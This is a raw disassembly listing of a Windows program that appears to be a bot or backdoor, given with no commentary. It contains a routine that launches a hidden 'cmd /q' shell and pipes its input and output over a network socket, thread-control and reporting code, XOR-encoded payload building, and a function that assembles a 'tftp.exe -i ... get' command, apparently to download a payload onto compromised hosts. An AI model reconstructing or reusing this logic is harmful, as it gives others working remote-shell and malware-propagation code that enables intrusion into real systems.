pop ecx
loc_416801: ; CODE XREF: sub_416717+1D�j
xor eax, eax
jmp short loc_41680B
; ---------------------------------------------------------------------------
loc_416805: ; CODE XREF: sub_416717+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_41680B: ; CODE XREF: sub_416717+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_416717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416810 proc near ; CODE XREF: sub_416717+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_417330
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_417330
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_42413C
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_424138 ;; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_424120 ;; CreateProcessA
test eax, eax
jz short loc_4168CC
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov ds:dword_4407F8[eax], ecx
call ds:off_424078
jmp short loc_4168E2
; ---------------------------------------------------------------------------
loc_4168CC: ; CODE XREF: sub_416810+9A�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_433A44
call sub_40BFE1
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_4168E2: ; CODE XREF: sub_416810+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_416810 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4168E9 proc near ; DATA XREF: sub_4165C6+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
mov ebx, ds:off_424074
push edi
mov edi, [ebp+arg_0]
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
loc_416912: ; CODE XREF: sub_4168E9+8F�j
call ebx ; sub_4E03FC
test eax, eax
jz short loc_41697A
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_41694D
loc_416923: ; CODE XREF: sub_4168E9+62�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_41693D
cmp dl, 0Dh
jz short loc_41693D
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_41693D: ; CODE XREF: sub_4168E9+44�j
; sub_4168E9+49�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_416923
loc_41694D: ; CODE XREF: sub_4168E9+38�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call ds:dword_43ADE8 ;; send
test eax, eax
jle short loc_41697A
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
jmp short loc_416912
; ---------------------------------------------------------------------------
loc_41697A: ; CODE XREF: sub_4168E9+2D�j
; sub_4168E9+79�j
mov esi, ds:dword_42408C
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_416996
call esi ; RtlGetLastWin32Error
push eax
push offset dword_433A90
call sub_40BFE1
pop ecx
pop ecx
loc_416996: ; CODE XREF: sub_4168E9+9C�j
pop edi
pop esi
pop ebx
leave
retn
sub_4168E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41699B proc near ; DATA XREF: sub_4165C6+71�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
loc_4169B4: ; CODE XREF: sub_41699B+39�j
; sub_41699B+D7�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call ds:dword_43ADB0 ;; recv
test eax, eax
jle loc_416AB9
cmp [ebp+var_10], ebx
jbe short loc_4169D6
dec [ebp+var_10]
jmp short loc_4169B4
; ---------------------------------------------------------------------------
loc_4169D6: ; CODE XREF: sub_41699B+34�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_416A99
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_416A46
cmp al, 7Fh
jz short loc_416A46
cmp al, 3
jnz short loc_416A01
push ebx
push ebx
call ds:dword_424184 ;; GenerateConsoleCtrlEvent
jmp short loc_416A6D
; ---------------------------------------------------------------------------
loc_416A01: ; CODE XREF: sub_41699B+5A�j
cmp al, 15h
jnz short loc_416A23
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_416A59
; ---------------------------------------------------------------------------
loc_416A23: ; CODE XREF: sub_41699B+68�j
mov [ebp+esi+var_DC], al
inc esi
push 1
cmp al, 0Dh
mov [ebp+var_8], al
pop ecx
jnz short loc_416A5A
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_416A59
; ---------------------------------------------------------------------------
loc_416A46: ; CODE XREF: sub_41699B+52�j
; sub_41699B+56�j
cmp esi, ebx
jbe short loc_416A70
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_416A59: ; CODE XREF: sub_41699B+86�j
; sub_41699B+A9�j
pop ecx
loc_416A5A: ; CODE XREF: sub_41699B+98�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call ds:dword_43ADE8 ;; send
test eax, eax
jle short loc_416AB9
loc_416A6D: ; CODE XREF: sub_41699B+64�j
mov al, byte ptr [ebp+arg_0+3]
loc_416A70: ; CODE XREF: sub_41699B+AD�j
cmp al, 0Dh
jnz loc_4169B4
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_42407C ;; WriteFile
test eax, eax
jz short loc_416AB9
xor esi, esi
jmp loc_4169B4
; ---------------------------------------------------------------------------
loc_416A99: ; CODE XREF: sub_41699B+47�j
cmp [ebp+var_C], ebx
jnz short loc_416AAA
mov [ebp+var_C], 1
jmp loc_4169B4
; ---------------------------------------------------------------------------
loc_416AAA: ; CODE XREF: sub_41699B+101�j
mov [ebp+var_10], 0Ah
mov [ebp+var_C], ebx
jmp loc_4169B4
; ---------------------------------------------------------------------------
loc_416AB9: ; CODE XREF: sub_41699B+2B�j
; sub_41699B+D0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41699B endp
; =============== S U B R O U T I N E =======================================
sub_416ABE proc near ; CODE XREF: sub_416ADE+A�p
; sub_416BB6+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_417AB0
push [esp+8+arg_4]
mov esi, eax
call sub_417AB0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_416ABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ADE proc near ; CODE XREF: sub_416BCD+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_416ABE
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_416AFB
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_416AFB: ; CODE XREF: sub_416ADE+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_417AB0
push [ebp+arg_C]
mov esi, eax
call sub_417AB0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov ds:dword_433B70, eax
lea eax, [edi+1]
mov ds:dword_433B91, eax
lea eax, [edi+17h]
mov ds:dword_433B89, eax
pop eax
push 74h
sub eax, edi
push offset dword_433B0C
push ebx
mov ds:dword_433B9F, eax
call sub_417390
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_417390
add esi, 74h
push 5
push (offset aTftp_exeIGet+0Ch)
lea eax, [esi+ebx]
push eax
call sub_417390
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_417390
add esi, edi
push 10h
push (offset aTftp_exeIGet+11h)
lea eax, [esi+ebx]
push eax
call sub_417390
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_417390
add esi, edi
push 38h
add esi, ebx
push offset byte_433B95
push esi
call sub_417390
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416ADE endp
; =============== S U B R O U T I N E =======================================
sub_416BB6 proc near ; CODE XREF: sub_416BCD+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_416ABE
push eax
call sub_416C3A
add esp, 0Ch
retn
sub_416BB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BCD proc near ; CODE XREF: sub_402B84+32�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_416BB6
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_416BED
cmp eax, 0FFFFh
jbe short loc_416BF1
loc_416BED: ; CODE XREF: sub_416BCD+17�j
xor eax, eax
jmp short loc_416C36
; ---------------------------------------------------------------------------
loc_416BF1: ; CODE XREF: sub_416BCD+1E�j
push esi
push edi
push ebx
call sub_416ABE
add eax, 101h
push eax
call sub_417B89
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_416ABE
pop ecx
pop ecx
push eax
push esi
call sub_416ADE
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416C55
push esi
mov edi, eax
call sub_417C3B
add esp, 24h
mov eax, edi
pop esi
loc_416C36: ; CODE XREF: sub_416BCD+22�j
pop edi
pop ebx
pop ebp
retn
sub_416BCD endp
; =============== S U B R O U T I N E =======================================
sub_416C3A proc near ; CODE XREF: sub_416BB6+E�p
; sub_416C55+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_416C43
inc ecx
loc_416C43: ; CODE XREF: sub_416C3A+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_416C3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C55 proc near ; CODE XREF: sub_416BCD+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_416C71
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_416C71
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_416C71
cmp byte ptr [ebp+arg_C], 0
jnz short loc_416C74
loc_416C71: ; CODE XREF: sub_416C55+8�j
; sub_416C55+E�j ...
inc [ebp+arg_C]
loc_416C74: ; CODE XREF: sub_416C55+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_416C9C
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_416C95
cmp al, 0Dh
jz short loc_416C95
cmp al, 5Ch
jz short loc_416C95
test al, al
jnz short loc_416C9C
loc_416C95: ; CODE XREF: sub_416C55+32�j
; sub_416C55+36�j ...
add [ebp+arg_C], 100h
loc_416C9C: ; CODE XREF: sub_416C55+28�j
; sub_416C55+3E�j
push [ebp+arg_C]
call sub_416C3A
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_416CB4
cmp eax, 0FFFFh
jbe short loc_416CBB
loc_416CB4: ; CODE XREF: sub_416C55+56�j
xor eax, eax
jmp loc_416D59
; ---------------------------------------------------------------------------
loc_416CBB: ; CODE XREF: sub_416C55+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, ds:byte_4CD988
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_416CEB
loc_416CCF: ; CODE XREF: sub_416C55+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_416CE2
cmp al, 0Ah
jz short loc_416CE2
cmp al, 0Dh
jz short loc_416CE2
cmp al, 5Ch
jnz short loc_416CE6
loc_416CE2: ; CODE XREF: sub_416C55+7F�j
; sub_416C55+83�j ...
inc bl
xor edx, edx
loc_416CE6: ; CODE XREF: sub_416C55+8B�j
inc edx
cmp edx, ecx
jb short loc_416CCF
loc_416CEB: ; CODE XREF: sub_416C55+78�j
cmp ecx, esi
mov ds:byte_4CD988, bl
ja short loc_416D17
push 15h
push offset loc_433AF4
push [ebp+arg_0]
mov ds:byte_433B01, cl
mov ds:byte_433B05, bl
call sub_417390
add esp, 0Ch
push 15h
jmp short loc_416D38
; ---------------------------------------------------------------------------
loc_416D17: ; CODE XREF: sub_416C55+9E�j
push 17h
push offset loc_433ADC
push [ebp+arg_0]
mov ds:word_433AEA, cx
mov ds:byte_433AEF, bl
call sub_417390
add esp, 0Ch
push 17h
loc_416D38: ; CODE XREF: sub_416C55+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_416D54
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_416D46: ; CODE XREF: sub_416C55+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_416D46
loc_416D54: ; CODE XREF: sub_416C55+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_416D59: ; CODE XREF: sub_416C55+61�j
pop esi
leave
retn
sub_416C55 endp
; =============== S U B R O U T I N E =======================================
sub_416D5C proc near ; CODE XREF: sub_4060D0+227�p
; sub_407252+F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_4405F0
loc_416D64: ; CODE XREF: sub_416D5C+18�j
cmp byte ptr [eax], 0
jz short loc_416D78
add eax, 234h
inc edi
cmp eax, offset dword_4CD5F0
jl short loc_416D64
jmp short loc_416DC3
; ---------------------------------------------------------------------------
loc_416D78: ; CODE XREF: sub_416D5C+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_4405F0[esi]
push eax
call sub_418C10
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov ds:dword_4407F0[esi], eax
and ds:dword_4407F4[esi], 0
mov eax, [esp+8+arg_8]
and ds:dword_4407F8[esi], 0
mov ds:dword_4407FC[esi], eax
and ds:byte_440808[esi], 0
pop esi
loc_416DC3: ; CODE XREF: sub_416D5C+1A�j
mov eax, edi
pop edi
retn
sub_416D5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416DC7 proc near ; DATA XREF: sub_40EE72+5C01�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_416E19
push [ebp+var_14]
call sub_417078
add esp, 14h
push 0
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_416DC7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E19 proc near ; CODE XREF: sub_416DC7+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aThreadList ; "-[Thread List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
xor edi, edi
mov esi, offset dword_4405F0
loc_416E43: ; CODE XREF: sub_416E19+78�j
cmp byte ptr [esi], 0
jz short loc_416E84
cmp [ebp+arg_C], 0
jnz short loc_416E57
cmp dword ptr [esi+204h], 0
jnz short loc_416E84
loc_416E57: ; CODE XREF: sub_416E19+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset aD_S ; "%d. %s"
push eax
call sub_4172B0
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 24h
loc_416E84: ; CODE XREF: sub_416E19+2D�j
; sub_416E19+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4CD5F0
jl short loc_416E43
pop edi
pop esi
leave
retn
sub_416E19 endp
; =============== S U B R O U T I N E =======================================
sub_416E97 proc near ; CODE XREF: sub_40EE72+4DD9�p
; sub_416F25+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_416F1F
cmp esi, 400h
jge short loc_416F1F
imul esi, 234h
push edi
push ebx
push ds:dword_440804[esi]
lea edi, dword_440804[esi]
call ds:dword_424168 ;; TerminateThread
cmp [edi], ebx
jz short loc_416ECF
push 1
pop ebp
loc_416ECF: ; CODE XREF: sub_416E97+33�j
mov [edi], ebx
lea edi, dword_4407F8[esi]
mov ds:dword_4407F0[esi], ebx
mov ds:dword_4407F4[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_416EF0
push eax
call sub_415419
pop ecx
loc_416EF0: ; CODE XREF: sub_416E97+50�j
mov [edi], ebx
lea edi, dword_4407FC[esi]
mov byte ptr ds:dword_4405F0[esi], bl
mov ds:byte_440808[esi], bl
push dword ptr [edi]
call ds:dword_43AE30 ;; closesocket
lea esi, dword_440800[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_43AE30 ;; closesocket
mov [esi], ebx
pop edi
loc_416F1F: ; CODE XREF: sub_416E97+D�j
; sub_416E97+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_416E97 endp
; =============== S U B R O U T I N E =======================================
sub_416F25 proc near ; CODE XREF: sub_40AC42:loc_40AC66�p
; sub_40D3A5+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_4405F0
loc_416F31: ; CODE XREF: sub_416F25+2A�j
cmp byte ptr [esi], 0
jz short loc_416F42
push edi
call sub_416E97
test eax, eax
pop ecx
jz short loc_416F42
inc ebx
loc_416F42: ; CODE XREF: sub_416F25+F�j
; sub_416F25+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4CD5F0
jl short loc_416F31
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_416F25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F57 proc near ; CODE XREF: sub_40EE72+1E3D�p
; sub_40EE72+1EAB�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_4407F4
loc_416F6B: ; CODE XREF: sub_416F57+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_416F8D
test edi, edi
jle short loc_416F7F
cmp [esi], edi
jz short loc_416F7F
cmp ebx, edi
jnz short loc_416F8D
loc_416F7F: ; CODE XREF: sub_416F57+1E�j
; sub_416F57+22�j
push ebx
call sub_416E97
test eax, eax
pop ecx
jz short loc_416F8D
inc [ebp+var_4]
loc_416F8D: ; CODE XREF: sub_416F57+1A�j
; sub_416F57+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4CD7F4
jl short loc_416F6B
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_416F57 endp
; =============== S U B R O U T I N E =======================================
sub_416FA4 proc near ; CODE XREF: sub_4071DB+B�p
; sub_407252+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_4407F0
loc_416FAB: ; CODE XREF: sub_416FA4+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_416FB4
inc eax
loc_416FB4: ; CODE XREF: sub_416FA4+D�j
add ecx, 234h
cmp ecx, offset dword_4CD7F0
jl short loc_416FAB
retn
sub_416FA4 endp
; =============== S U B R O U T I N E =======================================
sub_416FC3 proc near ; CODE XREF: sub_40EE72+5698�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_4407F0
loc_416FCD: ; CODE XREF: sub_416FC3+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_416FE6
add ecx, 234h
inc edx
cmp ecx, offset dword_4CD7F0
jl short loc_416FCD
pop esi
retn
; ---------------------------------------------------------------------------
loc_416FE6: ; CODE XREF: sub_416FC3+10�j
mov eax, edx
pop esi
retn
sub_416FC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FEA proc near ; CODE XREF: sub_40EE72+1070�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_417003
push [ebp+arg_1C]
call sub_41781F
pop ecx
loc_417003: ; CODE XREF: sub_416FEA+E�j
push eax
push [ebp+arg_18]
call sub_416F57
pop ecx
test eax, eax
pop ecx
jle short loc_41702F
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_4172B0
add esp, 14h
jmp short loc_417049
; ---------------------------------------------------------------------------
loc_41702F: ; CODE XREF: sub_416FEA+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_4172B0
add esp, 10h
loc_417049: ; CODE XREF: sub_416FEA+43�j
cmp [ebp+arg_C], 0
jnz short loc_417069
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_417069: ; CODE XREF: sub_416FEA+63�j
lea eax, [ebp+var_200]
push eax
call sub_40BF6D
pop ecx
leave
retn
sub_416FEA endp
; =============== S U B R O U T I N E =======================================
sub_417078 proc near ; CODE XREF: sub_401000+A5�p
; sub_40144A+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov ds:dword_440804[eax], ecx
mov ds:dword_4407F0[eax], ecx
mov ds:dword_4407F4[eax], ecx
mov ds:dword_4407F8[eax], ecx
mov ds:dword_4407FC[eax], ecx
mov ds:dword_440800[eax], ecx
mov byte ptr ds:dword_4405F0[eax], cl
mov ds:byte_440808[eax], cl
retn
sub_417078 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4170B5 proc near ; CODE XREF: sub_40EE72+6189�p
; sub_4171E3+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
loc_4170BF: ; CODE XREF: sub_4170B5+68�j
mov cl, [esi]
test cl, cl
jz short loc_41711F
cmp eax, 1
jnz short loc_41711F
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_41711F
cmp cl, 2Ah
jz short loc_417106
cmp cl, 3Fh
jz short loc_4170E9
cmp cl, 5Bh
jz short loc_4170EE
xor eax, eax
cmp cl, dl
setz al
loc_4170E9: ; CODE XREF: sub_4170B5+26�j
inc [ebp+arg_4]
jmp short loc_417119
; ---------------------------------------------------------------------------
loc_4170EE: ; CODE XREF: sub_4170B5+2B�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_41714B
mov esi, [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_417119
; ---------------------------------------------------------------------------
loc_417106: ; CODE XREF: sub_4170B5+21�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_4171E3
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_417119: ; CODE XREF: sub_4170B5+37�j
; sub_4170B5+4F�j
inc esi
mov [ebp+arg_0], esi
jmp short loc_4170BF
; ---------------------------------------------------------------------------
loc_41711F: ; CODE XREF: sub_4170B5+E�j
; sub_4170B5+13�j ...
cmp byte ptr [esi], 2Ah
jnz short loc_41712F
cmp eax, 1
jnz short loc_417146
inc esi
mov [ebp+arg_0], esi
jmp short loc_41711F
; ---------------------------------------------------------------------------
loc_41712F: ; CODE XREF: sub_4170B5+6D�j
cmp eax, 1
jnz short loc_417146
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_417146
cmp byte ptr [esi], 0
jnz short loc_417146
push 1
pop eax
jmp short loc_417148
; ---------------------------------------------------------------------------
loc_417146: ; CODE XREF: sub_4170B5+72�j
; sub_4170B5+7D�j ...
xor eax, eax
loc_417148: ; CODE XREF: sub_4170B5+8F�j
pop esi
pop ebp
retn
sub_4170B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41714B proc near ; CODE XREF: sub_4170B5+45�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
push 1
mov ecx, [edx]
and [ebp+var_8], edi
pop eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_41716C
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_41716C: ; CODE XREF: sub_41714B+19�j
push ebx
push esi
loc_41716E: ; CODE XREF: sub_41714B+7B�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_41717C
cmp [ebp+var_4], eax
jnz short loc_4171C8
loc_41717C: ; CODE XREF: sub_41714B+2A�j
test edi, edi
jnz short loc_4171BD
cmp bl, 2Dh
jnz short loc_4171B1
mov al, [ecx+1]
lea esi, [ecx+1]
mov cl, [ecx-1]
cmp cl, al
jge short loc_4171B1
cmp al, 5Dh
jz short loc_4171B1
cmp [ebp+var_4], edi
jnz short loc_4171B1
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_4171BD
cmp bl, al
jg short loc_4171BD
push 1
mov [edx], esi
pop edi
jmp short loc_4171BD
; ---------------------------------------------------------------------------
loc_4171B1: ; CODE XREF: sub_41714B+38�j
; sub_41714B+45�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_4171BD
push 1
pop edi
loc_4171BD: ; CODE XREF: sub_41714B+33�j
; sub_41714B+59�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
push 1
pop eax
jmp short loc_41716E
; ---------------------------------------------------------------------------
